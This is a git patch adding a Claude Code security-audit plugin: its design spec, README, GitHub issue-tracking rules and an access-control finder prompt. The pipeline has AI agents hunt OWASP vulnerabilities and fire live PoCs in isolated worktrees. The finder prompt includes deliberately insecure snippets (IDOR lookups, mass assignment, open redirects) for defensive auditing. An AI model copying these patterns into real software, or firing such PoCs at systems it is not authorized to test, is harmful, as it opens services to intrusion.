From dd230c77f5e78366685411d3db8592f18c458442 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 08:02:57 +0000
Subject: [PATCH 1/5] Add security plugin (vulnerability audit)

White-box, dynamically-verified security audit. /security:audit recons a target
repo, hunts OWASP Top 10:2025 vulnerabilities, proves them with live PoCs in
isolated git worktrees, and writes a high-signal senior-engineer report (proven
findings with a high-level proposed fix, not speculative noise).
---
 .claude-plugin/marketplace.json               |   8 +
 README.md                                     |   1 +
 plugins/security/.claude-plugin/plugin.json   |  13 +
 plugins/security/AGENTS.md                    | 197 +++++++
 plugins/security/README.md                    |  76 +++
 plugins/security/docs/issue-tracking.md       | 104 ++++
 .../prompts/finders/access-control.md         | 290 +++++++++++
 .../security/prompts/finders/auth-session.md  | 391 ++++++++++++++
 plugins/security/prompts/finders/crypto.md    | 324 ++++++++++++
 plugins/security/prompts/finders/csrf-cors.md | 346 ++++++++++++
 .../prompts/finders/deserialization.md        | 338 ++++++++++++
 plugins/security/prompts/finders/dos-redos.md | 339 ++++++++++++
 plugins/security/prompts/finders/injection.md | 300 +++++++++++
 .../prompts/finders/logging-errors.md         | 355 +++++++++++++
 plugins/security/prompts/finders/misconfig.md | 312 +++++++++++
 plugins/security/prompts/finders/path-file.md | 337 ++++++++++++
 plugins/security/prompts/finders/secrets.md   | 311 +++++++++++
 plugins/security/prompts/finders/ssrf.md      | 251 +++++++++
 .../security/prompts/finders/supply-chain.md  | 371 +++++++++++++
 plugins/security/prompts/finders/xss-ssti.md  | 300 +++++++++++
 plugins/security/prompts/playbooks/ci-iac.md  | 400 ++++++++++++++
 plugins/security/prompts/playbooks/crystal.md | 257 +++++++++
 .../prompts/playbooks/generic-docker.md       | 408 +++++++++++++++
 plugins/security/prompts/playbooks/go.md      | 411 +++++++++++++++
 .../security/prompts/playbooks/java-jvm.md    | 491 ++++++++++++++++++
 plugins/security/prompts/playbooks/node.md    | 339 ++++++++++++
 plugins/security/prompts/playbooks/php.md     | 399 ++++++++++++++
 plugins/security/prompts/playbooks/python.md  | 335 ++++++++++++
 plugins/security/prompts/playbooks/ruby.md    | 265 ++++++++++
 plugins/security/prompts/playbooks/rust.md    | 458 ++++++++++++++++
 plugins/security/prompts/recon.md             | 222 ++++++++
 plugins/security/prompts/report-template.md   |  91 ++++
 plugins/security/skills/audit/SKILL.md        |  77 +++
 plugins/security/workflows/vuln-audit.js      | 229 ++++++++
 34 files changed, 9346 insertions(+)
 create mode 100644 plugins/security/.claude-plugin/plugin.json
 create mode 100644 plugins/security/AGENTS.md
 create mode 100644 plugins/security/README.md
 create mode 100644 plugins/security/docs/issue-tracking.md
 create mode 100644 plugins/security/prompts/finders/access-control.md
 create mode 100644 plugins/security/prompts/finders/auth-session.md
 create mode 100644 plugins/security/prompts/finders/crypto.md
 create mode 100644 plugins/security/prompts/finders/csrf-cors.md
 create mode 100644 plugins/security/prompts/finders/deserialization.md
 create mode 100644 plugins/security/prompts/finders/dos-redos.md
 create mode 100644 plugins/security/prompts/finders/injection.md
 create mode 100644 plugins/security/prompts/finders/logging-errors.md
 create mode 100644 plugins/security/prompts/finders/misconfig.md
 create mode 100644 plugins/security/prompts/finders/path-file.md
 create mode 100644 plugins/security/prompts/finders/secrets.md
 create mode 100644 plugins/security/prompts/finders/ssrf.md
 create mode 100644 plugins/security/prompts/finders/supply-chain.md
 create mode 100644 plugins/security/prompts/finders/xss-ssti.md
 create mode 100644 plugins/security/prompts/playbooks/ci-iac.md
 create mode 100644 plugins/security/prompts/playbooks/crystal.md
 create mode 100644 plugins/security/prompts/playbooks/generic-docker.md
 create mode 100644 plugins/security/prompts/playbooks/go.md
 create mode 100644 plugins/security/prompts/playbooks/java-jvm.md
 create mode 100644 plugins/security/prompts/playbooks/node.md
 create mode 100644 plugins/security/prompts/playbooks/php.md
 create mode 100644 plugins/security/prompts/playbooks/python.md
 create mode 100644 plugins/security/prompts/playbooks/ruby.md
 create mode 100644 plugins/security/prompts/playbooks/rust.md
 create mode 100644 plugins/security/prompts/recon.md
 create mode 100644 plugins/security/prompts/report-template.md
 create mode 100644 plugins/security/skills/audit/SKILL.md
 create mode 100644 plugins/security/workflows/vuln-audit.js

diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json
index 76b3a07..c03099a 100644
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -12,6 +12,14 @@
       "version": "0.1.0",
       "category": "ruby",
       "keywords": ["ruby", "bundler", "gem", "dependencies"]
+    },
+    {
+      "name": "security",
+      "source": "./plugins/security",
+      "description": "White-box, dynamically-verified security audit. /security:audit recons a repo, hunts OWASP Top 10:2025 vulnerabilities, proves them with live PoCs in isolated worktrees, and writes a high-signal senior-engineer report.",
+      "version": "0.1.0",
+      "category": "security",
+      "keywords": ["security", "pentest", "vulnerability", "audit", "owasp", "appsec"]
     }
   ]
 }
diff --git a/README.md b/README.md
index 5ee7465..0b9e3c1 100644
--- a/README.md
+++ b/README.md
@@ -25,6 +25,7 @@ If the plugin's commands don't show up in the `/` menu, run `/reload-plugins`.
 | Plugin | Description |
 | --- | --- |
 | [gem](plugins/gem) | Ruby gem helpers. Includes `/gem:bump` for changelog-rich dependency bumps. |
+| [security](plugins/security) | Dynamically-verified security audit. `/security:audit` proves vulnerabilities with live PoCs and writes a senior-engineer report. |
 
 ## Developing plugins
 
diff --git a/plugins/security/.claude-plugin/plugin.json b/plugins/security/.claude-plugin/plugin.json
new file mode 100644
index 0000000..0cfc554
--- /dev/null
+++ b/plugins/security/.claude-plugin/plugin.json
@@ -0,0 +1,13 @@
+{
+  "name": "security",
+  "version": "0.1.0",
+  "description": "White-box, dynamically-verified security audit. /security:audit recons a repo, hunts vulnerabilities across the OWASP Top 10:2025 classes, proves them with live PoCs in isolated worktrees, and writes a high-signal senior-engineer report.",
+  "author": {
+    "name": "84codes",
+    "url": "https://github.com/84codes"
+  },
+  "homepage": "https://github.com/84codes/claude-plugins/tree/main/plugins/security",
+  "repository": "https://github.com/84codes/claude-plugins",
+  "license": "MIT",
+  "keywords": ["security", "pentest", "vulnerability", "audit", "owasp", "appsec", "sast"]
+}
diff --git a/plugins/security/AGENTS.md b/plugins/security/AGENTS.md
new file mode 100644
index 0000000..fc21577
--- /dev/null
+++ b/plugins/security/AGENTS.md
@@ -0,0 +1,197 @@
+# vuln-audit — agent & design spec
+
+A Claude Code **skill + workflow** that runs a white-box, dynamically-verified
+security audit of a target repository: a
+multi-phase pipeline (recon → triage → deep review → adversarial verify →
+dynamic repro → report) that produces **proven, high-signal findings with
+patches**, not speculative noise.
+
+> Read this file before touching the workflow or prompts. It is the source of
+> truth for the data contracts, taxonomy, severity model, and signal policy.
+
+## Invocation
+
+```
+/security:audit /path/to/target-repo [--no-dynamic] [--classes injection,ssrf] [--out <dir>]
+```
+
+The skill (`skills/audit/SKILL.md`) is the agent-facing entry point. It parses the
+target, picks a writable `outDir`, preflights host capabilities, then calls the
+workflow (`workflows/vuln-audit.js`) with everything assembled in `args` —
+`toolRoot` = `${CLAUDE_PLUGIN_ROOT}` (read-only, holds the prompts), `outDir` =
+where the bundle is written.
+
+## Pipeline
+
+| Phase | What | Primitive |
+|-------|------|-----------|
+| 1. Recon | Detect stack, map attack surface & trust boundaries, pick run strategy, select relevant finder classes | single agent (`prompts/recon.md`) |
+| 2. Triage | One finder per vuln class scans its surface, emits candidate findings | `parallel()` finders |
+| 3. Dedup | Collapse same-root-cause findings across call sites | plain JS in the workflow |
+| 4. Deep review | Re-examine each candidate with surrounding context (callers, sanitizers, related files); confirm a reachable source→sink path | `pipeline()` stage |
+| 5. Adversarial verify | Independent skeptics, each a distinct lens, try to **refute** the finding; majority-refute kills it | `parallel()` skeptic panel |
+| 6. Dynamic repro | Survivors are built & run in an isolated git **worktree** (docker-first); a real PoC is fired and impact observed | `agent(..., {isolation:'worktree'})` |
+| 7. Report | Synthesize the senior-engineer report (`prompts/report-template.md`) | single agent |
+
+## Reference evaluation (why we adopt what we adopt)
+
+- **Anthropic security-guidance** (`code.claude.com/docs/en/security-guidance`)
+  — **adopt methodology.** Validates our core moves: (a) review independence —
+  the reviewer is a *fresh-context* agent, never the author, "instructed only to
+  find problems"; (b) read callers/sanitizers/related files before reporting to
+  keep false positives low. Our tool is the deepest layer: in-session plugin →
+  `/security-review` (branch) → Code Review (PR) → **vuln-audit (on-demand,
+  dynamically verified PoCs)**. We honor its extension convention: if the target
+  has a `.claude/claude-security-guidance.md`, we load it as extra threat-model
+  context.
+- **OWASP Top 10:2025** — **adopt as primary taxonomy.** Current edition; new
+  categories A03 Software Supply Chain Failures and A10 Mishandling of
+  Exceptional Conditions; SSRF folded into A01. Every finder maps to a 2025 ID.
+- **OWASP ASVS v5.0** (17 chapters, ~350 reqs) — **reference only, not a walked
+  checklist.** Walking 350 requirements is exactly the low-signal sidetrack we
+  avoid. Used two ways: (a) coverage map so the finder taxonomy has no blind
+  spots; (b) cite a requirement/chapter ID in findings as a terse, authoritative
+  reference for senior readers.
+- **OSSF Scorecard** — **partial adopt, code-exploitable checks only.** Scorecard
+  scores project *hygiene/posture* (Maintained, License, SBOM, Security-Policy,
+  Contributors) — out of scope for findings. But its CI/CD checks ARE real
+  exploitable issues and feed our `supply-chain` finder: Dangerous-Workflow
+  (`pull_request_target` + untrusted checkout, `${{ }}` script injection),
+  Token-Permissions (over-broad `GITHUB_TOKEN`), Pinned-Dependencies (unpinned
+  actions/deps), Vulnerabilities (known-vuln deps via OSV). Posture/process
+  checks are relegated to the Info appendix, never the high-priority body.
+
+## Vuln-class taxonomy (finders)
+
+Each maps to OWASP Top 10:2025 + CWE + an ASVS v5.0 chapter. One prompt file per
+class under `prompts/finders/<key>.md`.
+
+| key | title | OWASP 2025 | ASVS |
+|-----|-------|-----------|------|
+| access-control | Broken Access Control & IDOR | A01 | V8 |
+| ssrf | Server-Side Request Forgery | A01 | V4 |
+| injection | Injection (SQL/NoSQL/OS/LDAP) | A05 | V1/V2 |
+| xss-ssti | XSS & Template Injection | A05 | V1/V3 |
+| auth-session | Authentication & Session | A07 | V6/V7/V9/V10 |
+| crypto | Cryptographic Failures | A04 | V11 |
+| deserialization | Insecure Deserialization & Integrity | A08 | V2/V15 |
+| path-file | Path Traversal & File Handling | A01 | V5 |
+| secrets | Hardcoded Secrets & Credentials | A02 | V14 |
+| misconfig | Security Misconfiguration | A02 | V13 |
+| supply-chain | Software Supply Chain & CI/CD | A03 | V15 |
+| logging-errors | Logging, Error & Exception Handling | A09/A10 | V16 |
+| dos-redos | Denial of Service & ReDoS | A06 | V2 |
+| csrf-cors | CSRF, CORS & Clickjacking | A01 | V3 |
+
+Insecure Design (A06) is cross-cutting and handled in recon/synthesis, not a
+grep-able finder.
+
+## Data contracts
+
+### Finding (finders + deep review)
+`id` · `title` · `vuln_class` · `owasp` (A0x:2025) · `cwe` · `asvs` ·
+`severity` (critical|high|medium|low|info) · `status` (confirmed|likely|triage) ·
+`confidence` (low|medium|high) · `file` · `line` · `end_line` ·
+`code_excerpt` · `source` (untrusted origin) · `sink` (dangerous op) ·
+`data_flow` (source→sink, sanitizers noted) · `sanitizers_checked` (mitigations
+verified absent/ineffective — the FP guard) · `rationale` · `exploit_sketch` ·
+`dynamic_poc_plan` · `proposed_fix` (high-level direction of the change, not a
+patch — implementation is left to whoever takes the issue).
+
+After the pipeline, each finding is also stamped with `fp` (stable fingerprint =
+`djb2(vuln_class | file | sink)`, the cross-scan dedup key), `display_id`
+(`<slug>-<CLASS>-<fp4>`, provisional until the courier swaps in the GitHub issue
+number), `status`, `kept`, `reject_reason`, `verdicts`, and `repro`.
+
+### Verdict (adversarial verify)
+`finding_id` · `lens` · `refuted` (bool) · `confidence` · `reasoning`.
+
+### Repro (dynamic verify)
+`finding_id` · `reproduced` (bool) · `method`
+(live-exploit|unit-test|build-only|static-poc) · `environment` ·
+`setup_commands` · `poc` · `observed` (evidence) · `impact` · `notes`.
+
+## Severity model (exploitability × impact)
+
+- **Critical** — remote, unauth → RCE / full data breach / auth bypass; reachable.
+- **High** — low barrier (authenticated or realistic conditions); significant
+  impact (priv-esc, sensitive data, injection with a real sink).
+- **Medium** — unusual conditions or limited impact, or partial mitigations.
+- **Low** — minor info leak, defense-in-depth gap, hard to exploit.
+- **Info** — hygiene/posture, no direct exploit path.
+
+`status` is orthogonal and drives report placement: **confirmed** (dynamically
+reproduced or statically proven + survived verify), **likely** (strong proof, no
+live repro), **triage** (unverified / split verdicts). Only confirmed+likely go
+in the report body; triage goes to an appendix.
+
+## Signal discipline (the anti-noise contract)
+
+The report is for senior engineers. Stay high-signal — enforced in deep review
+and verify:
+
+- Report only issues with a **reachable** path from untrusted input to a
+  dangerous sink. Check for sanitizers/validators/authz on the path first; if
+  present and effective, drop it.
+- No style/lint nits. No generic "defense-in-depth" without a concrete sink. No
+  unreachable/dead code.
+- Posture/process items (missing SECURITY.md, SBOM, license, maintainership) →
+  Info appendix only, never the body.
+- Dedup: one finding per root cause, list N locations.
+- Prefer few proven findings over many speculative ones. Every High+ finding
+  carries a PoC or an explicit source→sink trace.
+
+## Layout
+
+```
+.claude-plugin/plugin.json           # plugin manifest (name: security)
+skills/audit/SKILL.md                 # agent-facing orchestrator (/security:audit)
+workflows/vuln-audit.js              # the Workflow script (the engine)
+prompts/recon.md                     # phase-1 recon prompt
+prompts/finders/<key>.md             # one finder prompt per vuln class
+prompts/playbooks/<key>.md           # per-ecosystem build/run/exploit playbook
+prompts/report-template.md           # the report format (phase 7)
+docs/issue-tracking.md               # output bundle → GitHub issues + naming rules
+```
+(The output bundle is written to a writable `outDir`, NOT into the plugin root,
+which is read-only/ephemeral.)
+
+Schemas live inline in the workflow (the JS sandbox has no filesystem access at
+runtime); prose content lives in `prompts/` so it is editable without touching
+the script, and is passed into the workflow via `args`.
+
+## Output bundle (VM → courier handoff)
+
+The scan runs on a VM and emits a self-contained **bundle** at
+`reports/<slug>/`; a separate "courier" agent SSHes in, fetches it, and files the
+issues (the courier holds the only GitHub creds — the VM holds none). Bundle:
+
+- `report.md` — the human report (findings referenced by `display_id`).
+- `findings.json` — the structured findings array, verbatim; the machine
+  interface the courier reconciles against, **keyed by `fp`**.
+- `manifest.json` — `{ tool, schema, repo (owner/repo), target_path, ref,
+  commit, slug, date, dynamic, classes_assessed, counts }`; `repo` tells the
+  courier where to file.
+- `evidence/` — optional captured PoC output (repro evidence also lives inline
+  in `findings.json`).
+
+**Issue tracking & the vulnerability ID/naming rules** (scan epic → finding
+sub-issues, reconcile by `fp`, `display_id` = `<slug>-<CLASS>-<issue#>`, the
+courier emitter, and what each host needs) live in
+[`docs/issue-tracking.md`](docs/issue-tracking.md) — the portable source of truth
+that travels with the repo.
+
+## Runtime notes (gotchas)
+
+- **`args` arrives as a JSON string.** The Workflow runtime delivers the `args`
+  payload to the script as a JSON *string*, not a parsed object (verified
+  empirically). `vuln-audit.js` normalizes it (`typeof args === 'string' ?
+  JSON.parse(args) : args`) before reading any input — do not remove this.
+- **Invoke by `scriptPath`, not `name`, mid-session.** Named-workflow discovery
+  only registers files that existed at session start.
+- **Subagents have full tools** (Read/Grep/Bash/Write/ast-grep, and web via
+  ToolSearch) and operate on the *target*; only the orchestration JS is
+  sandboxed. Dynamic repro creates its own `git worktree` of the target — the
+  `isolation:'worktree'` option is about the tool repo and is not used here.
+- **Host adaptivity:** pass `hostNotes` so recon picks a runnable strategy
+  (docker vs native) the host can actually execute.
diff --git a/plugins/security/README.md b/plugins/security/README.md
new file mode 100644
index 0000000..98ea224
--- /dev/null
+++ b/plugins/security/README.md
@@ -0,0 +1,76 @@
+# security (vulnerability audit)
+
+A white-box, **dynamically-verified** security-audit plugin for internal
+pentests. `/security:audit` points at a repo you own, recons it, hunts
+vulnerabilities across the OWASP Top 10:2025 classes, **proves them with live
+PoCs in isolated git worktrees**, and writes a terse, senior-engineer report —
+proven findings with a high-level proposed fix, not speculative noise.
+
+## Install
+
+```
+/plugin marketplace add 84codes/claude-plugins
+/plugin install security@84codes
+```
+
+Then run `/reload-plugins` if the command doesn't appear.
+
+## Usage
+
+```
+/security:audit /abs/path/to/target-repo
+/security:audit /abs/path/to/target-repo --no-dynamic
+/security:audit /abs/path/to/target-repo --classes injection,ssrf,access-control --ref v1.2.0
+/security:audit /abs/path/to/target-repo --out /abs/writable/dir
+```
+
+The output **bundle** is written to `<cwd>/vuln-audit-reports/<slug>/` (or
+`--out`): `report.md` + `findings.json` + `manifest.json`.
+
+## How it works
+
+```
+recon → triage → consolidate → deep review → adversarial verify → dynamic PoC → report
+```
+
+| Phase | Purpose |
+|-------|---------|
+| Recon | Detect stack, map attack surface, pick relevant vuln classes + run strategy. |
+| Triage | One finder agent per relevant class emits candidates. |
+| Consolidate | Dedup by root cause, assign IDs, drop low-signal noise. |
+| Deep review | Confirm a reachable source→sink path with no mitigation. |
+| Adversarial verify | Independent skeptics try to refute each finding; majority kills it. |
+| Dynamic PoC | Build + run the target in an isolated worktree; fire a real exploit. |
+| Report | Senior-engineer report: severity-first, reference-backed, PoC-evidenced. |
+
+## Requirements
+
+- `git` (target must be a git repo for worktree isolation + the live-PoC phase).
+- `docker` for dynamic verification (works via `sudo` if the daemon needs it);
+  otherwise repro falls back to unit-test/static PoCs (`--no-dynamic` skips it).
+- No security scanners required — the tool is LLM-native and uses
+  `semgrep`/`gitleaks`/`trivy` only opportunistically if present.
+
+## Output & issue tracking
+
+Findings carry a stable fingerprint (`fp`) and a `display_id`
+(`<slug>-<CLASS>-<n>`). The bundle is designed to be filed to GitHub issues by a
+separate courier step (scan epic + per-finding sub-issues for Critical/High/
+Medium, reconciled by `fp`). See [`docs/issue-tracking.md`](docs/issue-tracking.md).
+
+## Design
+
+Full pipeline spec, vuln-class taxonomy (OWASP 2025 + CWE + ASVS), data
+contracts, and the signal-discipline policy are in
+[`AGENTS.md`](AGENTS.md).
+
+## Safety & scope
+
+Authorized testing only — audit repositories you own or are explicitly cleared
+to test. All PoC traffic is contained to local processes/containers; the tool
+never fires exploits at external hosts, uses real credentials, or exfiltrates
+data.
+
+## License
+
+MIT
diff --git a/plugins/security/docs/issue-tracking.md b/plugins/security/docs/issue-tracking.md
new file mode 100644
index 0000000..94901da
--- /dev/null
+++ b/plugins/security/docs/issue-tracking.md
@@ -0,0 +1,104 @@
+# Output handling — findings → GitHub issues
+
+How a scan's findings become tracked, fixable, closeable GitHub issues. This is
+the source of truth for the **vulnerability ID / naming rules** and the
+scan→courier→GitHub pipeline. (Design locked 2026-06-02.)
+
+## Topology: scanner VM + courier
+
+Scans run on a **VM**; a separate **courier** agent SSHes in, fetches the scan's
+output, and files it to GitHub. The two run on different hosts on purpose:
+
+- The **VM** runs `/security:audit`, handles untrusted code and working exploits, and
+  holds **no GitHub credentials**.
+- The **courier** holds the only GitHub creds, fetches the bundle read-only over
+  SSH, and creates/updates issues. It is a *pure function of the bundle* — it
+  needs no access to the target source or the VM's git state.
+
+## The bundle (the scan→courier interface)
+
+Each scan drops a self-contained bundle at `reports/<slug>/` on the VM:
+
+| File | Purpose |
+|------|---------|
+| `report.md` | Human report (findings headed by `display_id`). |
+| `findings.json` | Structured findings array, **verbatim**; the machine interface, **keyed by `fp`**. |
+| `manifest.json` | `{ tool, schema, repo (owner/repo), target_path, ref, commit, slug, date, dynamic, classes_assessed, counts }`. `repo` tells the courier where to file. |
+| `evidence/` | Optional captured PoC output (repro evidence also lives inline in `findings.json`). |
+
+## Vulnerability ID / naming rules
+
+- **Fingerprint** `fp = djb2(vuln_class | file | sink)` (lowercased; line number
+  excluded to reduce churn). This is the **stable, cross-scan dedup key** — same
+  bug → same `fp`, computed identically on the VM and the courier with no shared
+  state. Stored on each issue as a `fp:<hash>` label.
+- **Display ID** `<slug>-<CLASS>-<n>` — e.g. `training-tool-AC-42`. `<slug>` is the
+  repo name, `<CLASS>` the short class code (AC, SSRF, INJ, XSS, AUTH, CRYPTO,
+  DESER, PATH, SEC, MISC, SUPPLY, LOG, DOS, CSRF), and **`<n>` is the GitHub issue
+  number**. So `training-tool-AC-42` *is* `84codes/training-tool#42` — one number,
+  both meanings, permanent (GitHub never reuses issue numbers).
+- **Provisional form** `<slug>-<CLASS>-<fp4>` (first 4 hex of `fp`, e.g.
+  `training-tool-AC-b4a0`) — used in the VM-side `report.md` *before* an issue
+  exists. The courier stamps the final `-<issue#>` ID into the issue at filing;
+  `fp` is the glue linking the two forms.
+- Numbers are **not contiguous per class** (GitHub shares the counter with PRs and
+  other issues) — that is fine; the class prefix carries the meaning.
+
+## Issue model
+
+- **Scan issue** (epic), one per run: holds the report + general comments; closes
+  when all its finding sub-issues close.
+- **Finding sub-issue**, one per **Critical / High / Medium** (confirmed+likely).
+  **Low/Info stay in the report appendix — never issues** (same high-signal
+  contract as the report).
+- **Title:** `[Critical] training-tool-AC-42: <short title> (access-control)`.
+- **Body:** the report's finding block (refs · location · PoC · impact ·
+  proposed fix) + backlink to the scan issue + the `fp` marker.
+- **Labels:** `security`, `security-scan` (epic), `sev:{critical,high,medium}`,
+  `vuln:<class>`, `fp:<hash>`, `status:{confirmed,likely}` (verification outcome).
+- **Two distinct "statuses":** *verification* (confirmed/likely — a scan output,
+  carried as the finding's badge + the `status:` label) vs *lifecycle*
+  (open/fixed — owned entirely by the GitHub issue). The **report has no status
+  table**; the scan epic and its sub-issues are the live status.
+- **PoC handling:** repos are private/internal, so full PoC commands go in the
+  issues (the remediation is a high-level *proposed fix*, not a patch). (If a target were public, use GitHub Security Advisories for
+  Critical/High instead.)
+
+## Reconcile algorithm (idempotent, keyed by `fp`)
+
+For each Critical/High/Medium finding in `findings.json`, look up existing issues
+by the `fp:<hash>` label (`gh issue list --search "label:fp:<fp>" --state all`):
+
+- **no match** → create the finding issue, link it under the scan epic.
+- **open match** → comment "still present in scan `<id>`" (no duplicate).
+- **closed match that still reproduces** → reopen as a regression + comment.
+- **previously open, now absent / not reproduced** (dynamic re-verify) → comment +
+  close.
+
+Re-running the courier on the same bundle is a no-op. The dynamic-repro phase
+doubles as the fix-verifier, so "everything closed when done" is provable, not
+manual.
+
+## Close loop
+
+Fix PRs use `Fixes #N` to auto-close the finding issue on merge; the next scan
+confirms via dynamic re-verify. When all finding sub-issues are closed, the scan
+epic closes.
+
+## Build status
+
+1. **Done (2026-06-02)** — the workflow emits the bundle and stamps `fp` +
+   provisional `display_id`. See `workflows/vuln-audit.js`.
+2. **Not built yet** — the `/security:track <bundle-dir>` courier skill +
+   `gh` emitter. Blocked on `gh` being installed + authed on the courier host.
+3. **Always gated** — creating real issues on a repo needs an explicit go-ahead.
+
+## What each host needs
+
+| Host | Role | Requirements |
+|------|------|--------------|
+| **VM (scanner)** | runs `/security:audit`, produces the bundle | Claude Code · this repo · `git` · `docker` · **no `gh`, no GitHub creds** |
+| **Courier** | fetches bundle, files issues | Claude Code · this repo (for `/security:track`) · **`gh` + `gh auth login`** (token: Issues read/write) · **SSH key to the VM** (`ssh`/`rsync`) · `jq` (optional) |
+
+Sub-issue linking uses GitHub's GraphQL API, which `gh api graphql` covers — no
+extra tooling.
diff --git a/plugins/security/prompts/finders/access-control.md b/plugins/security/prompts/finders/access-control.md
new file mode 100644
index 0000000..bf6a5ef
--- /dev/null
+++ b/plugins/security/prompts/finders/access-control.md
@@ -0,0 +1,290 @@
+# Finder — Broken Access Control & IDOR (`access-control`)
+
+OWASP A01:2025 · CWE-639/862/863/601 · ASVS v5.0 V8
+
+## 1. Objective
+
+Hunt for handlers that act on a resource or perform a state change without an
+**ownership/role check that ties the actor to the target**: IDOR (object id
+straight from the request → DB/file lookup with no scope), missing/incorrect
+authorization (`@login_required` ≠ `is_owner`), privilege escalation (role/flag
+set from request, vertical bypass), forced browsing (unguarded admin/internal
+routes), mass assignment (request body bound to a model with sensitive
+attributes), and open redirect (user-controlled `Location`/`returnUrl`).
+
+## 2. Where to look
+
+Map the **router → handler → data access** path. The flaw lives in the handler:
+an untrusted id/role/url reaches a sink with no per-actor check on the path.
+
+- **Route tables / decorators**: `routes.rb`, `config/routes`, Rails
+  `resources`, Sinatra/Kemal/Lucky `get "/x/:id"`, Express `app.get/router.use`,
+  Flask/FastAPI/Django `@app.route`/`urls.py`/`path()`, Gin/Echo/chi
+  `r.GET("/:id")`, Spring `@GetMapping`/`@PreAuthorize`, Laravel
+  `Route::resource`, actix/axum `.route(...)`.
+- **Auth middleware vs. authZ**: a global `authenticate`/`requireLogin`
+  middleware proves *identity*, not *authorization*. The gap is the handler that
+  trusts the authenticated session but never checks the object belongs to that
+  user. Look for routes mounted **outside** the auth middleware (forced
+  browsing) and admin/debug/internal routes with no role gate.
+- **Object lookups keyed by request param**: `find(params[:id])`,
+  `findById(req.params.id)`, `get_object_or_404(pk=request.GET['id'])`,
+  `WHERE id = $1` where `$1` is request-derived, file paths from `req.query`.
+- **Mass assignment**: `Model.update(params)`, `User(**request.json)`,
+  `Object.assign(user, req.body)`, `model.save(req.body)`, struct-tag binding
+  (`c.Bind(&user)`, `json.Unmarshal(body, &user)`), `$request->all()`.
+- **Role / privilege fields**: anything writing `role`, `is_admin`, `isAdmin`,
+  `admin`, `permissions`, `account_type`, `org_id`, `tenant_id`, `user_id`,
+  `owner_id`, `price`, `balance`, `status` from request input.
+- **Redirects**: `redirect(params[:url])`, `res.redirect(req.query.next)`,
+  `RedirectResponse(url)`, `http.Redirect(w,r,url,302)`,
+  `header("Location: $url")`, `sendRedirect`, OAuth/login `returnTo`/`next`/
+  `callback`/`redirect_uri`.
+- **Signals per language**:
+  - **Crystal** (Kemal/Lucky/Amber): `env.params.url["id"]`, `User.find(id)`,
+    `env.redirect params["url"]`; check for an `Authorize`/`before_action`
+    pipe that scopes by `current_user`.
+  - **Ruby/Rails**: `Model.find(params[:id])` vs.
+    `current_user.models.find(...)`; CanCanCan `authorize!`/Pundit
+    `authorize`; `permit!`/`params.permit(...)`; `redirect_to params[:return_to]`.
+  - **Node/TS**: `Model.findById(req.params.id)`, `req.user` trusted but no
+    `where: { userId: req.user.id }`; `{ ...req.body }` spread into update;
+    `res.redirect(req.query.url)`.
+  - **Python**: Django `.get(pk=...)` w/o `.filter(owner=request.user)`;
+    DRF `queryset` without `get_queryset` scoping or `permission_classes`;
+    FastAPI path param → `db.query(Item).get(id)`; `setattr(obj, k, v)` loops.
+  - **Go**: `db.First(&x, c.Param("id"))`, `c.Bind(&u)` then `db.Save(&u)`,
+    role compared as string from header/JWT claim without verification.
+  - **PHP/Laravel**: `Model::find($id)` w/o policy; `$user->update($request->all())`;
+    `Gate`/`@can`/`authorize` absence; `redirect($request->input('url'))`.
+  - **Java/Spring**: `repo.findById(id)` w/o `@PreAuthorize`/owner check;
+    `@ModelAttribute User user` (binder) without `@InitBinder` allow-list;
+    `response.sendRedirect(request.getParameter("url"))`.
+  - **Rust** (axum/actix): `Path(id)` → `sqlx::query!(... WHERE id = ?)` with no
+    `AND owner_id = $session_user`; `Redirect::to(&params.url)`.
+
+## 3. Detection heuristics
+
+The pattern is always: **request-controlled identifier/role/url (SOURCE) reaches
+a resource access, mutation, or redirect (SINK) with no check that the actor is
+entitled to that specific object/operation.**
+
+SOURCES (untrusted): path/query/body params, headers, cookies, JWT/claims that
+are attacker-supplied or unverified, multipart fields, GraphQL args, webhook
+payloads.
+
+SINKS (dangerous ops): ORM/SQL lookup or mutation keyed by the id; file/blob
+fetch by id/path; field assignment of privileged attributes; HTTP redirect;
+admin/internal action dispatch.
+
+- **IDOR — object access without scope**
+
+  ```ruby
+  # Rails — id straight from params, no current_user scope
+  invoice = Invoice.find(params[:id])          # SINK: any id readable
+  send_data invoice.pdf                          # vs. current_user.invoices.find(...)
+  ```
+  ```ts
+  // Express — findById trusts the session for identity, not ownership
+  const doc = await Document.findById(req.params.id);   // SINK
+  res.json(doc);   // no { where: { ownerId: req.user.id } }
+  ```
+  ```python
+  # Django — pk from request, no owner filter
+  order = Order.objects.get(pk=request.GET["id"])   # SINK
+  # safe form: Order.objects.get(pk=..., user=request.user)
+  ```
+  ```go
+  db.First(&account, c.Param("id"))   // SINK: no AND user_id = claims.Sub
+  ```
+
+- **Missing function-level authZ / forced browsing** — route handler does a
+  privileged action with only an authentication gate (or none):
+
+  ```python
+  @app.route("/admin/users/<id>/delete", methods=["POST"])
+  @login_required                      # identity only; no role check
+  def delete_user(id): User.delete(id) # SINK: any logged-in user deletes anyone
+  ```
+  ```java
+  @GetMapping("/internal/metrics")     // mounted outside security filter chain
+  public Metrics metrics() { ... }     // forced browsing
+  ```
+
+- **Privilege escalation via mass assignment** — request body binds onto a model
+  with privileged columns:
+
+  ```ruby
+  user.update(params[:user])            # SINK: params[:user][:admin]=true
+  # safe: params.require(:user).permit(:name, :email)
+  ```
+  ```ts
+  await User.update({ ...req.body }, { where: { id } });  // role/isAdmin writable
+  ```
+  ```go
+  c.Bind(&user); db.Save(&user)         // user.Role from JSON body
+  ```
+  ```php
+  $user->update($request->all());       // no $fillable allow-list / guarded
+  ```
+
+- **Privilege escalation, direct** — role/flag set from request, or self-escalate
+  on own record: `current_user.update(role: params[:role])`, comparing a header/
+  claim string `if req.headers["x-role"] == "admin"`.
+
+- **Open redirect** — user input flows to the redirect target:
+
+  ```ts
+  res.redirect(req.query.next);                 // SINK
+  ```
+  ```python
+  return redirect(request.args["url"])          # SINK
+  ```
+  ```php
+  header("Location: " . $_GET["url"]);          // SINK
+  ```
+  ```ruby
+  redirect_to params[:return_to]                # SINK (Rails ≥7 warns; older silent)
+  ```
+
+## 4. Not-a-finding (false-positive guard)
+
+Before flagging, confirm NONE of these neutralize the path. If an effective
+control sits between source and sink, do **not** report.
+
